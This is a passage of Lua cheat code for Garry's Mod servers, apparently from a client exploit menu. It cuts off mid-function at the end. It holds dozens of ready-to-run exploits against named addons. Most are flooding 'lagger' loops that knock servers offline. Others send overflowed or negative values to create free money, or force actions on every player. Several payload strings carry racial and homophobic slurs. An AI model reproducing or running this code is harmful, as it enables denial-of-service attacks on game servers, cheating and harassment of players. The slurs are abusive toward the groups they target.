  4266. net.Start("Chess ClientWager")
  4267. net.WriteUInt( -999999999999999999999999999, 24 )
  4268. net.SendToServer()
  4269. net.Start("Chess ClientResign")
  4270. net.SendToServer()
  4271. end )
  4272. end
  4274. status = ValidNetString("netOrgVoteInvite_Server")
  4275. if (status) then
  4276. ECPrint("Found Exploit: Org Invite All [netOrgVoteInvite_Server]")
  4277. addExploit( "236","Org Invite All", "", function()
  4278. surface.PlaySound("garrysmod/ui_click.wav")
  4279. ECNotify("Starting")
  4280. for k,v in pairs(player.GetAll()) do
  4281. net.Start("netOrgVoteInvite_Server")
  4282. net.WriteEntity(v)
  4283. net.SendToServer()
  4284. end
  4285. end )
  4286. end
  4289. status = ValidNetString("donatorshop_itemtobuy")
  4290. if (status) then
  4291. ECPrint("Found Exploit: Donator Box Exploit [donatorshop_itemtobuy]")
  4292. addExploit( "237","Donator Box Exploit", "", function()
  4293. surface.PlaySound("garrysmod/ui_click.wav")
  4294. ECNotify("Starting")
  4295. net.Start("donatorshop_itemtobuy")
  4296. net.WriteString("DonatorShopBuyTripwire")
  4297. net.SendToServer()
  4298. end )
  4299. end
  4301. status = ValidNetString("AskPickupItemInv")
  4302. if (status) then
  4303. ECPrint("Found Exploit: Ask Item [AskPickupItemInv]")
  4304. addExploit( "238","Ask Item", "", function()
  4305. surface.PlaySound("garrysmod/ui_click.wav")
  4306. ECNotify("Starting")
  4307. for k,v in pairs(player.GetAll()) do
  4308. net.Start("AskPickupItemInv")
  4309. net.WriteUInt(4,16)
  4310. net.WriteUInt(1,16)
  4311. net.SendToServer()
  4312. end
  4313. end )
  4314. end
  4316. status = ValidNetString("buy_bundle")
  4317. if (status) then
  4318. ECPrint("Found Exploit: Buy Bundle [buy_bundle]")
  4319. addExploit( "239","Buy Bundle", "", function()
  4320. surface.PlaySound("garrysmod/ui_click.wav")
  4321. ECNotify("Starting")
  4322. net.Start("buy_bundle")
  4323. net.WriteFloat(1, 16)
  4324. net.SendToServer()
  4325. end )
  4326. end
  4328. status = ValidNetString("LawyerOfferBail")
  4329. if (status) then
  4330. ECPrint("Found Exploit: Lawyer Off Bail [LawyerOfferBail | AcceptBailOffer]")
  4331. addExploit( "240","Lawyer Off Bail", "", function()
  4332. surface.PlaySound("garrysmod/ui_click.wav")
  4333. ECNotify("Starting")
  4334. for k,v in pairs(player.GetAll()) do
  4335. net.Start("LawyerOfferBail")
  4336. net.WriteEntity(v)
  4337. net.WriteUInt(-100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000, 16)
  4338. net.SendToServer()
  4339. net.Start("AcceptBailOffer")
  4340. net.WriteEntity(v)
  4341. net.WriteUInt(-10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000, 16)
  4342. net.SendToServer()
  4343. end
  4344. end )
  4345. end
  4347. status = ValidNetString("MineServer")
  4348. if (status) then
  4349. ECPrint("Found Exploit: Lagger #22 [MineServer]")
  4350. addExploit( "241","Lagger #22", "lags", function()
  4351. surface.PlaySound("garrysmod/ui_click.wav")
  4352. ECNotify("Starting")
  4353. for i = 0, 100 do
  4354. for k,v in pairs(player.GetAll()) do
  4355. net.Start("MineServer",true)
  4356. net.WriteString("sell")
  4357. net.WriteEntity(v)
  4358. net.WriteString("Fuck you. Gonna ddos this shitty ass server niggers")
  4359. net.SendToServer()
  4360. end
  4361. end
  4362. end )
  4363. end
  4365. status = ValidNetString("Gb_gasstation_BuyGas")
  4366. if (status) then
  4367. ECPrint("Found Exploit: Ukrainian gas [Gb_gasstation_BuyGas | Gb_gasstation_BuyJerrycan]")
  4368. addExploit( "242","Ukrainian gas", "", function()
  4369. surface.PlaySound("garrysmod/ui_click.wav")
  4370. ECNotify("Starting")
  4371. net.Start("Gb_gasstation_BuyGas")
  4372. net.SendToServer()
  4373. net.Start("Gb_gasstation_BuyJerrycan")
  4374. net.SendToServer()
  4375. end )
  4376. end
  4378. status = ValidNetString("D3A_CreateOrg")
  4379. if (status) then
  4380. ECPrint("Found Exploit: D3A Create Org [D3A_CreateOrg]")
  4381. addExploit( "243","D3A Create Org", "", function()
  4382. surface.PlaySound("garrysmod/ui_click.wav")
  4383. ECNotify("Starting")
  4384. net.Start("D3A_CreateOrg")
  4385. net.WriteString('969690485273489312467812367128312312314')
  4386. net.WriteString('123712983712984571298712398')
  4387. net.WriteString("255 255 255")
  4388. net.SendToServer()
  4389. end )
  4390. end
  4392. status = ValidNetString("Shop_buy")
  4393. if (status) then
  4394. ECPrint("Found Exploit: SUP Buy Armor [Shop_buy]")
  4395. addExploit( "244","SUP Buy Armor", "", function()
  4396. surface.PlaySound("garrysmod/ui_click.wav")
  4397. ECNotify("Starting")
  4398. net.Start("Shop_buy")
  4399. net.WriteString("Armor")
  4400. net.SendToServer()
  4401. end )
  4402. end
  4404. status = ValidNetString("LawsToServer")
  4405. if (status) then
  4406. ECPrint("Found Exploit: SUP New Laws [LawsToServer]")
  4407. addExploit( "245","SUP New Laws", "", function()
  4408. surface.PlaySound("garrysmod/ui_click.wav")
  4409. ECNotify("Starting")
  4410. net.Start("LawsToServer")
  4411. net.WriteString("FAGGOTS")
  4412. net.SendToServer()
  4413. end )
  4414. end
  4416. status = ValidNetString("D3A_Message")
  4417. if (status) then
  4418. ECPrint("Found Exploit: D3A Message [D3A_Message]")
  4419. addExploit( "246","D3A Message", "", function()
  4420. surface.PlaySound("garrysmod/ui_click.wav")
  4421. ECNotify("Starting")
  4422. local stuff = {
  4424. }
  4425. net.Start("D3A_Message")
  4426. net.WriteString("FAGGOTS")
  4427. net.WriteTable(stuff)
  4428. net.SendToServer()
  4429. end )
  4430. end
  4432. status = ValidNetString("misswd_accept")
  4433. if (status) then
  4434. ECPrint("Found Exploit: Misswd Accept [misswd_accept]")
  4435. addExploit( "247","Misswd Accept", "", function()
  4436. surface.PlaySound("garrysmod/ui_click.wav")
  4437. ECNotify("Starting")
  4438. for k,v in pairs(player.GetAll()) do
  4439. for i = 0, 100 do
  4440. net.Start("misswd_accept")
  4441. net.WriteEntity(v)
  4442. net.SendToServer()
  4443. end
  4444. end
  4445. end )
  4446. end
  4448. status = ValidNetString("ScannerMenu")
  4449. if (status) then
  4450. ECPrint("Found Exploit: Scanner Exploit [ScannerMenu]")
  4451. addExploit( "248","Scanner Exploit", "", function()
  4452. surface.PlaySound("garrysmod/ui_click.wav")
  4453. ECNotify("Starting")
  4454. for k,v in pairs(player.GetAll()) do
  4455. net.Start("ScannerMenu")
  4456. net.WriteEntity(v)
  4457. net.WriteFloat(1)
  4458. net.WriteFloat(1)
  4459. net.SendToServer()
  4460. end
  4461. end )
  4462. end
  4464. status = ValidNetString("ORG_NewOrg")
  4465. if (status) then
  4466. ECPrint("Found Exploit: New ORG [ORG_NewOrg]")
  4467. addExploit( "249","New ORG", "", function()
  4468. surface.PlaySound("garrysmod/ui_click.wav")
  4469. ECNotify("Starting")
  4470. net.Start("ORG_NewOrg")
  4471. net.WriteString("I FUCKING HATE YOU!")
  4472. net.SendToServer()
  4473. end )
  4474. end
  4476. status = ValidNetString("ORG_VaultDonate")
  4477. if (status) then
  4478. ECPrint("Found Exploit: Free Money #27 [ORG_VaultDonate]")
  4479. addExploit( "250","Free Money #27", "", function()
  4480. surface.PlaySound("garrysmod/ui_click.wav")
  4481. ECNotify("Starting")
  4482. net.Start("ORG_VaultDonate")
  4483. net.WriteFloat(-1000000000000000000000000000000000000000000000000000000)
  4484. net.SendToServer()
  4485. end )
  4486. end
  4488. status = ValidNetString("Selldatride")
  4489. if (status) then
  4490. ECPrint("Found Exploit: Sell Datride [Selldatride]")
  4491. addExploit( "251","Sell Datride", "", function()
  4492. surface.PlaySound("garrysmod/ui_click.wav")
  4493. ECNotify("Starting")
  4494. for k,v in pairs(player.GetAll()) do
  4495. net.Start("Selldatride")
  4496. net.WriteEntity(v)
  4497. net.SendToServer()
  4498. end
  4499. end )
  4500. end
  4502. status = ValidNetString("passmayorexam")
  4503. if (status) then
  4504. ECPrint("Found Exploit: Passexam Exploit [passmayorexam]")
  4505. addExploit( "252","Passexam Exploit", "", function()
  4506. surface.PlaySound("garrysmod/ui_click.wav")
  4507. ECNotify("Starting")
  4508. net.Start("passmayorexam")
  4509. net.SendToServer()
  4510. end )
  4511. end
  4513. status = ValidNetString("levelup_useperk")
  4514. if (status) then
  4515. ECPrint("Found Exploit: LevelUp Exploit [levelup_useperk]")
  4516. addExploit( "253","LevelUp Exploit", "", function()
  4517. surface.PlaySound("garrysmod/ui_click.wav")
  4518. ECNotify("Starting")
  4519. net.Start("levelup_useperk")
  4520. net.WriteInt(1, 8)
  4521. net.WriteInt(2, 8)
  4522. net.WriteInt(3, 8)
  4523. net.WriteInt(4, 8)
  4524. net.SendToServer()
  4525. end )
  4526. end
  4528. status = ValidNetString("ZED_SpawnCar")
  4529. if (status) then
  4530. ECPrint("Found Exploit: ZED Spawn Car [ZED_SpawnCar]")
  4531. addExploit( "254","ZED Spawn Car", "", function()
  4532. surface.PlaySound("garrysmod/ui_click.wav")
  4533. ECNotify("Starting")
  4534. net.Start("ZED_SpawnCar")
  4535. net.WriteFloat(1)
  4536. net.SendToServer()
  4537. end )
  4538. end
  4540. status = ValidNetString("DeployMask") --
  4541. if (status) then
  4542. ECPrint("Found Exploit: To wear a gas mask at all players [DeployMask]")
  4543. addExploit( "255","To wear a gas mask", "Exploit puts gas masks on all players, discovered by Leith", function()
  4544. surface.PlaySound("garrysmod/ui_click.wav")
  4545. ECNotify("Starting")
  4546. for k,v in pairs(ents.GetAll()) do
  4547. net.Start("DeployMask")
  4548. net.WriteEntity(v)
  4549. net.SendToServer()
  4550. end
  4551. end )
  4552. end
  4554. status = ValidNetString("RemoveMask") --
  4555. if (status) then
  4556. ECPrint("Found Exploit: Remove the gas mask from all players [RemoveMask]")
  4557. addExploit( "256","Remove the gas mask", "The exploit takes off gas masks from all players, discovered by Leith", function()
  4558. surface.PlaySound("garrysmod/ui_click.wav")
  4559. ECNotify("Starting")
  4560. for k,v in pairs(ents.GetAll()) do
  4561. net.Start("RemoveMask")
  4562. net.WriteEntity(v)
  4563. net.SendToServer()
  4564. end
  4565. end )
  4566. end
  4568. status = ValidNetString("SwapFilter") --
  4569. if (status) then
  4570. ECPrint("Found Exploit: Change all filters of a gas mask [SwapFilter]")
  4571. addExploit( "257","Change all filters", "Exploit changes the filter for all gas masks, discovered by Leith", function()
  4572. surface.PlaySound("garrysmod/ui_click.wav")
  4573. ECNotify("Starting")
  4574. for k,v in pairs(ents.GetAll()) do
  4575. net.Start("SwapFilter")
  4576. net.WriteEntity(v)
  4577. net.SendToServer()
  4578. end
  4579. end )
  4580. end
  4582. status = ValidNetString("WipeMask") --
  4583. if (status) then
  4584. ECPrint("Found Exploit: Wipe gas masks [WipeMask]")
  4585. addExploit( "258","Wipe gas masks", "Exploit wipes all gas masks, discovered by Leith", function()
  4586. surface.PlaySound("garrysmod/ui_click.wav")
  4587. ECNotify("Starting")
  4588. for k,v in pairs(ents.GetAll()) do
  4589. net.Start("WipeMask")
  4590. net.WriteEntity(v)
  4591. net.SendToServer()
  4592. end
  4593. end )
  4594. end
  4596. status = ValidNetString("UseMedkit") --
  4597. if (status) then
  4598. ECPrint("Found Exploit: Use Medkit [UseMedkit]")
  4599. addExploit( "259","Use Medkit", "Exploit uses a first aid kit on all players, discovered by Leith", function()
  4600. surface.PlaySound("garrysmod/ui_click.wav")
  4601. ECNotify("Starting")
  4602. for k,v in pairs(ents.GetAll()) do
  4603. net.Start("UseMedkit")
  4604. net.WriteEntity(v)
  4605. net.SendToServer()
  4606. end
  4607. end )
  4608. end
  4610. status = ValidNetString("IDInv_RequestBank")
  4611. if (status) then
  4612. ECPrint("Found Exploit: Lagger #23 [IDInv_RequestBank]")
  4613. addExploit( "260","Lagger #23", "an exploit in the addon 'IDinventory', discovered by Leith", function()
  4614. surface.PlaySound("garrysmod/ui_click.wav")
  4615. ECNotify("Starting")
  4616. if !timer.Exists("lagger23") then
  4617. timer.Create("lagger23", 0, 0, function()
  4618. for i = 1, 1000 do
  4619. net.Start("IDInv_RequestBank",true)
  4620. net.SendToServer()
  4621. end
  4622. end )
  4623. end
  4624. end )
  4625. end
  4627. status = ValidNetString("casinokit_chipexchange")
  4628. if (status) then
  4629. ECPrint("Found Exploit: Lagger #24 [casinokit_chipexchange]")
  4630. addExploit( "261","Lagger #24", "an exploit in the addon 'CasinoKit', discovered by Leith", function()
  4631. surface.PlaySound("garrysmod/ui_click.wav")
  4632. ECNotify("Starting")
  4633. if !timer.Exists("lagger24") then
  4634. timer.Create("lagger24", 0, 0, function()
  4635. for i = 1, 1000 do
  4636. net.Start("casinokit_chipexchange",true)
  4637. net.WriteEntity(LocalPlayer())
  4638. net.WriteString("darkrp")
  4639. net.WriteBool(false)
  4640. net.WriteUInt(9999999999999999999999999999999999999999999999999999999999,32)
  4641. net.SendToServer()
  4642. end
  4643. end )
  4644. end
  4645. end )
  4646. end
  4648. status = ValidNetString("RemoveTag")
  4649. if (status) then
  4650. ECPrint("Found Exploit: 1tap server [RemoveTag]")
  4651. addExploit( "262","1tap server", "discovered by Leith", function()
  4652. surface.PlaySound("garrysmod/ui_click.wav")
  4653. ECNotify("Starting")
  4654. timer.Create("1tap", 0.5, 0, function()
  4655. for i=1, 4000 do
  4656. net.Start("RemoveTag")
  4657. net.WriteFloat(9999999999999999999999999999999999999999999999999999999999)
  4658. net.SendToServer()
  4659. end
  4660. end )
  4661. end )
  4662. end
  4664. status = ValidNetString("desktopPrinter_Withdraw")
  4665. if (status) then
  4666. ECPrint("Found Exploit: Lagger #25 [desktopPrinter_Withdraw]")
  4667. addExploit( "263","Lagger #25", "an exploit in the addon 'Desktop Printers', discovered by Leith", function()
  4668. surface.PlaySound("garrysmod/ui_click.wav")
  4669. ECNotify("Starting")
  4670. if !timer.Exists("lagger25") then
  4671. timer.Create("lagger25", 0, 0, function()
  4672. for i = 1, 1000 do
  4673. net.Start("desktopPrinter_Withdraw",true)
  4674. net.WriteEntity(LocalPlayer())
  4675. net.SendToServer()
  4676. end
  4677. end )
  4678. end
  4679. end )
  4680. end
  4682. status = ValidNetString("sphys_dupe")
  4683. if (status) then
  4684. ECPrint("Found Exploit: Lagger #26 [sphys_dupe]")
  4685. addExploit( "264","Lagger #26", "an exploit in the addon 'Simfphys', discovered by Solly", function()
  4686. surface.PlaySound("garrysmod/ui_click.wav")
  4687. ECNotify("Starting")
  4688. timer.Create("lagger26", 0.2, 0, function()
  4689. for i=1,2200 do
  4690. net.Start("sphys_dupe",true)
  4691. net.SendToServer()
  4692. end
  4693. end )
  4694. end )
  4695. end
  4697. status = ValidNetString("simfphys_gasspill")
  4698. if (status) then
  4699. ECPrint("Found Exploit: Poop on players [simfphys_gasspill]")
  4700. addExploit( "265","Poop on players", "an exploit in the addon 'Simfphys', discovered by Solly", function()
  4701. surface.PlaySound("garrysmod/ui_click.wav")
  4702. ECNotify("Starting")
  4703. timer.Create("poop", 0.1, 0, function()
  4704. for k,v in pairs(player.GetAll()) do
  4705. for j=1,3 do
  4706. if IsValid(v) then
  4707. net.Start("simfphys_gasspill")
  4708. net.WriteVector(v:GetPos()+Vector(0,0,90))
  4709. net.WriteVector(v:EyePos())
  4710. net.SendToServer()
  4711. end
  4712. end
  4713. end
  4714. end )
  4715. end )
  4716. end
  4718. status = ValidNetString("dronesrewrite_controldr")
  4719. if (status) then
  4720. ECPrint("Found Exploit: Lagger #27 [dronesrewrite_controldr]")
  4721. addExploit( "266","Lagger #27", "discovered by Solly", function()
  4722. surface.PlaySound("garrysmod/ui_click.wav")
  4723. ECNotify("Starting")
  4724. timer.Create("lagger27", 0.2, 0, function()
  4725. for i=1,2200 do
  4726. net.Start("dronesrewrite_controldr",true)
  4727. net.SendToServer()
  4728. end
  4729. end )
  4730. end )
  4731. end
  4734. status = ValidNetString("SCP-294Sv")
  4735. if (status) then
  4736. ECPrint("Found Exploit: SCP-294 Exploit [SCP-294Sv]")
  4737. addExploit( "267","SCP-294 Exploit", "discovered by questionmark", function()
  4738. surface.PlaySound("garrysmod/ui_click.wav")
  4739. ECNotify("Starting")
  4740. for k,v in pairs(ents.GetAll()) do
  4741. net.Start("SCP-294Sv")
  4742. net.WriteString("acid")
  4743. net.WriteEntity(v)
  4744. net.SendToServer()
  4745. end
  4746. end )
  4747. end
  4749. status = ValidNetString("VC_PlayerReady")
  4750. if (status) then
  4751. ECPrint("Found Exploit: Lagger #28 [VC_PlayerReady]")
  4752. addExploit( "268","Lagger #28", "an exploit in the addon 'VCMod', discovered by Leith", function()
  4753. surface.PlaySound("garrysmod/ui_click.wav")
  4754. ECNotify("Starting")
  4755. timer.Create("lagger28", 0, 0, function()
  4756. for i = 1, 1000 do
  4757. net.Start("VC_PlayerReady",true)
  4758. net.SendToServer()
  4759. end
  4760. end )
  4761. end )
  4762. end
  4764. status = ValidNetString("phone")
  4765. if (status) then
  4766. ECPrint("Found Exploit: Call all players [phone]")
  4767. addExploit( "269","Call all players", "discovered by questionmark", function()
  4768. surface.PlaySound("garrysmod/ui_click.wav")
  4769. ECNotify("Starting")
  4770. for k, v in pairs(player.GetAll()) do
  4771. net.Start("phone")
  4772. net.WriteTable{
  4773. ply=v,
  4774. act='call'
  4775. }
  4776. net.SendToServer()
  4777. end
  4778. end )
  4779. end
  4781. status = ValidNetString("blueatm")
  4782. if (status) then
  4783. ECPrint("Found Exploit: Lagger #29 [blueatm]")
  4784. addExploit( "270","Lagger #29", "an exploit in the addon 'Blue ATM', discovered by Leith", function()
  4785. surface.PlaySound("garrysmod/ui_click.wav")
  4786. ECNotify("Starting")
  4787. timer.Create("lagger29", 0, 0, function()
  4788. for i = 1, 1000 do
  4789. net.Start("blueatm",true)
  4790. net.WriteEntity(LocalPlayer())
  4791. net.SendToServer()
  4792. end
  4793. end )
  4794. end )
  4795. end
  4797. status = ValidNetString("cab_cd_testdrive")
  4798. if (status) then
  4799. ECPrint("Found Exploit: Stavox Teleport [cab_cd_testdrive]")
  4800. addExploit( "271","Stavox Teleport", "discovered by Aromatic", function()
  4801. surface.PlaySound("garrysmod/ui_click.wav")
  4802. ECNotify("Starting")
  4803. net.Start('cab_cd_testdrive')
  4804. net.WriteUInt(0, 3)
  4805. net.WriteUInt(5, 8)
  4806. net.SendToServer()
  4807. end )
  4808. end
  4810. status = ValidNetString("cab_sendmessage")
  4811. if (status) then
  4812. ECPrint("Found Exploit: Stavox Message [cab_sendmessage]")
  4813. addExploit( "272","Stavox Message", "discovered by Aromatic", function()
  4814. surface.PlaySound("garrysmod/ui_click.wav")
  4815. ECNotify("Starting")
  4816. for k, v in pairs(player.GetAll()) do
  4817. net.Start("cab_sendmessage")
  4818. net.WriteEntity(v)
  4819. net.WriteString("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n")
  4820. net.SendToServer()
  4821. end
  4822. end )
  4823. end
  4825. status = ValidNetString("disguise")
  4826. if (status) then
  4827. ECPrint("Found Exploit: Lagger #30 [disguise]")
  4828. addExploit( "273","Lagger #30", "discovered by Aromatic & Leith", function()
  4829. surface.PlaySound("garrysmod/ui_click.wav")
  4830. timer.Create("lagger30", 0, 0, function()
  4831. for i = 1, 1000 do
  4832. net.Start("disguise",true)
  4833. net.WriteInt(9999999999999999999999999999999999999999999999999999999999, 32)
  4834. net.SendToServer()
  4835. end
  4836. end )
  4837. end )
  4838. end
  4840. status = ValidNetString("FARMINGMOD_DROPITEM")
  4841. if (status) then
  4842. ECPrint("Found Exploit: Lagger #31 [FARMINGMOD_DROPITEM]")
  4843. addExploit( "274","Lagger #31", "discovered by Leith", function()
  4844. surface.PlaySound("garrysmod/ui_click.wav")
  4845. timer.Create("lagger31", 0, 0, function()
  4846. for i = 1, 1000 do
  4847. net.Start("FARMINGMOD_DROPITEM",true)
  4848. net.WriteInt(9999999999999999999999999999999999999999999999999999999999, 16)
  4849. net.SendToServer()
  4850. end
  4851. end )
  4852. end )
  4853. end
  4855. status = ValidNetString("SlotsRemoved")
  4856. if (status) then
  4857. ECPrint("Found Exploit: Lagger #32 [SlotsRemoved]")
  4858. addExploit( "275","Lagger #32", "an exploit in the addon 'PointShop 2 Perma Weapons', discovered by Leith", function()
  4859. surface.PlaySound("garrysmod/ui_click.wav")
  4860. timer.Create("lagger32", 0, 0, function()
  4861. for i = 1, 1000 do
  4862. net.Start("SlotsRemoved",true)
  4863. net.SendToServer()
  4864. end
  4865. end )
  4866. end )
  4867. end
  4869. status = ValidNetString("AirDrops_StartPlacement")
  4870. if (status) then
  4871. ECPrint("Found Exploit: Lagger #33 [AirDrops_StartPlacement]")
  4872. addExploit( "276","Lagger #33", "an exploit in the addon 'PointShop 2 AirDrops', discovered by Dembi", function()
  4873. surface.PlaySound("garrysmod/ui_click.wav")
  4874. timer.Create("lagger33", 0, 0, function()
  4875. for i = 1, 1000 do
  4876. net.Start("AirDrops_StartPlacement",true)
  4877. net.SendToServer()
  4878. end
  4879. end )
  4880. end )
  4881. end
  4883. status = ValidNetString("pp_info_send")
  4884. if (status) then
  4885. ECPrint("Found Exploit: Lagger #34 [pp_info_send]")
  4886. addExploit( "277","Lagger #34", "an exploit in the addon 'Perma Props',discovered by Leith", function()
  4887. surface.PlaySound("garrysmod/ui_click.wav")
  4888. timer.Create("lagger33", 0, 0, function()
  4889. for i = 1, 1000 do
  4890. net.Start("pp_info_send",true)
  4891. net.SendToServer()
  4892. end
  4893. end )
  4894. end )
  4895. end
  4897. status = ValidNetString("IGS.GetPaymentURL")
  4898. if (status) then
  4899. ECPrint("Found Exploit: Lagger #35 [IGS.GetPaymentURL]")
  4900. addExploit( "278","Lagger #35", "an exploit in the 'IGS', discovered by Leith", function()
  4901. surface.PlaySound("garrysmod/ui_click.wav")
  4902. timer.Create("lagger35", 0, 0, function()
  4903. for i = 1, 1000 do
  4904. net.Start("IGS.GetPaymentURL",true)
  4905. net.WriteDouble(9999999999999999999999999999999999999999999999999999999999)
  4906. net.SendToServer()
  4907. end
  4908. end )
  4909. end )
  4910. end
  4912. status = ValidNetString("fg_printer_money")
  4913. if (status) then
  4914. ECPrint("Found Exploit: Lagger #36 [fg_printer_money]")
  4915. addExploit( "279","Lagger #36", "an exploit in the 'FG Printers', discovered by Aromatic", function()
  4916. surface.PlaySound("garrysmod/ui_click.wav")
  4917. timer.Create("lagger36", 0, 0, function()
  4918. for i = 1, 1000 do
  4919. net.Start('fg_printer_money',true)
  4920. net.WriteEntity(LocalPlayer())
  4921. net.SendToServer()
  4922. end
  4923. end )
  4924. end )
  4925. end
  4927. status = ValidNetString("tickbookpayfine")
  4928. if (status) then
  4929. ECPrint("Found Exploit: Lagger #37 [tickbookpayfine]")
  4930. addExploit( "280","Lagger #37", "an exploit in the 'Ticket Book', discovered by Aromatic", function()
  4931. surface.PlaySound("garrysmod/ui_click.wav")
  4932. timer.Create("lagger37", 0, 0, function()
  4933. for i = 1, 1000 do
  4934. net.Start("tickbookpayfine",true)
  4935. net.SendToServer()
  4936. end
  4937. end )
  4938. end )
  4939. end
  4941. status = ValidNetString("BeginSpin")
  4942. if (status) then
  4943. ECPrint("Found Exploit: Lagger #38 [BeginSpin]")
  4944. addExploit( "281","Lagger #38", "an exploit in the 'Blue Unbox 2', discovered by Leith", function()
  4945. surface.PlaySound("garrysmod/ui_click.wav")
  4946. timer.Create("lagger38", 0, 0, function()
  4947. for i = 1, 1000 do
  4948. net.Start("BeginSpin",true)
  4949. net.SendToServer()
  4950. end
  4951. end )
  4952. end )
  4953. end
  4955. status = ValidNetString("DuelRequestClient")
  4956. if (status) then
  4957. ECPrint("Found Exploit: Lagger #39 [DuelRequestClient]")
  4958. addExploit( "282","Lagger #39", "discovered by Leith", function()
  4959. surface.PlaySound("garrysmod/ui_click.wav")
  4960. timer.Create("lagger39", 0, 0, function()
  4961. for i = 1, 1000 do
  4962. net.Start("DuelRequestClient",true)
  4963. net.SendToServer()
  4964. end
  4965. end )
  4966. end )
  4967. end
  4969. status = ValidNetString("ncpstoredoact")
  4970. if (status) then
  4971. ECPrint("Found Exploit: Lagger #40 [ncpstoredoact]")
  4972. addExploit( "283","Lagger #40", "an exploit in the addon 'NPC Store',discovered by Leith", function()
  4973. surface.PlaySound("garrysmod/ui_click.wav")
  4974. timer.Create("lagger40", 0, 0, function()
  4975. for i = 1, 1000 do
  4976. net.Start("ncpstoredoact",true)
  4977. net.SendToServer()
  4978. end
  4979. end )
  4980. end )
  4981. end
  4983. status = ValidNetString("PermwepsNPCSellWeapon")
  4984. if (status) then
  4985. ECPrint("Found Exploit: Lagger #41 [PermwepsNPCSellWeapon]")
  4986. addExploit( "284","Lagger #41", "discovered by Leith", function()
  4987. surface.PlaySound("garrysmod/ui_click.wav")
  4988. timer.Create("lagger41", 0, 0, function()
  4989. for i = 1, 2000 do
  4990. net.Start("PermwepsNPCSellWeapon",true)
  4991. net.WriteString("")
  4992. net.SendToServer()
  4993. end
  4994. end )
  4995. end )
  4996. end
  4998. status = ValidNetString("bitcoins_request_withdraw")
  4999. if (status) then
  5000. ECPrint("Found Exploit: Lagger #42 [bitcoins_request_withdraw]")
  5001. addExploit( "285","Lagger #42", "discovered by Leith", function()
  5002. surface.PlaySound("garrysmod/ui_click.wav")
  5003. timer.Create("lagger42", 0, 0, function()
  5004. for i = 1, 2000 do
  5005. net.Start("bitcoins_request_withdraw",true)
  5006. net.SendToServer()
  5007. end
  5008. end )
  5009. end )
  5010. end
  5012. status = ValidNetString("bitcoins_request_turn_on")
  5013. if (status) then
  5014. ECPrint("Found Exploit: To include all bitcoin miners [bitcoins_request_turn_on]")
  5015. addExploit( "286","To include all bitcoin miners", "discovered by Leith", function()
  5016. surface.PlaySound("garrysmod/ui_click.wav")
  5017. ECNotify("Starting")
  5018. for k, v in pairs(ents.GetAll()) do
  5019. if v:GetModel() == "models/props_c17/consolebox01a.mdl" then
  5020. net.Start("bitcoins_request_turn_on")
  5021. net.WriteEntity(v)
  5022. net.SendToServer()
  5023. end
  5024. end
  5025. end)
  5026. end
  5028. status = ValidNetString("bitcoins_request_turn_off")
  5029. if (status) then
  5030. ECPrint("Found Exploit: Disable all bitcoin miners [bitcoins_request_turn_off]")
  5031. addExploit( "287","Disable all bitcoin miners", "discovered by Leith", function()
  5032. surface.PlaySound("garrysmod/ui_click.wav")
  5033. ECNotify("Starting")
  5034. for k, v in pairs(ents.GetAll()) do
  5035. if v:GetModel() == "models/props_c17/consolebox01a.mdl" then
  5036. net.Start("bitcoins_request_turn_off")
  5037. net.WriteEntity(v)
  5038. net.SendToServer()
  5039. end
  5040. end
  5041. end)
  5042. end
  5044. status = ValidNetString("NET_AM_MakePotion")
  5045. if (status) then
  5046. ECPrint("Found Exploit: Lagger #43 [NET_AM_MakePotion]")
  5047. addExploit( "288","Lagger #43", "discovered by Leith", function()
  5048. surface.PlaySound("garrysmod/ui_click.wav")
  5049. ECNotify("Starting")
  5050. timer.Create("lagger43", 0, 0, function()
  5051. for i = 1, 2000 do
  5052. net.Start('NET_AM_MakePotion',true)
  5053. net.WriteEntity(LocalPlayer())
  5054. net.WriteInt(9999999999999999999999999999999999999999999999999999999999, 8)
  5055. net.SendToServer()
  5056. end
  5057. end )
  5058. end )
  5059. end
  5061. status = ValidNetString("minigun_drones_switch")
  5062. if (status) then
  5063. ECPrint("Found Exploit: Lagger #44 [minigun_drones_switch]")
  5064. addExploit( "289","Lagger #44", "discovered by Solly", function()
  5065. surface.PlaySound("garrysmod/ui_click.wav")
  5066. ECNotify("Starting")
  5067. timer.Create("lagger44", 0.2, 0, function()
  5068. for i=1,2200 do
  5069. net.Start("minigun_drones_switch",true)
  5070. net.SendToServer()
  5071. end
  5072. end )
  5073. end )
  5074. end
  5076. status = ValidNetString("CW20_PRESET_LOAD")
  5077. if (status) then
  5078. ECPrint("Found Exploit: Lagger #45 (u need cw2 weapon in hand) [CW20_PRESET_LOAD]")
  5079. addExploit( "290","Lagger #45", "(u need cw2 weapon in hand),discovered by Solly", function()
  5080. surface.PlaySound("garrysmod/ui_click.wav")
  5081. ECNotify("Starting")
  5082. timer.Create("lagger45", 0.2, 0, function()
  5083. if(LocalPlayer():GetActiveWeapon():GetClass():find("cw"))then
  5084. for i=1,2200 do
  5085. net.Start("CW20_PRESET_LOAD",true)
  5086. net.SendToServer()
  5087. end
  5088. end
  5089. end )
  5090. end )
  5091. end
  5093. status = ValidNetString("SBP_addtime")
  5094. if (status) then
  5095. ECPrint("Found Exploit: Lagger #46 [SBP_addtime]")
  5096. addExploit( "291","Lagger #46", "discovered by Solly", function()
  5097. surface.PlaySound("garrysmod/ui_click.wav")
  5098. ECNotify("Starting")
  5099. timer.Create("lagger46", 0.3, 0, function()
  5100. for i=1,2200 do
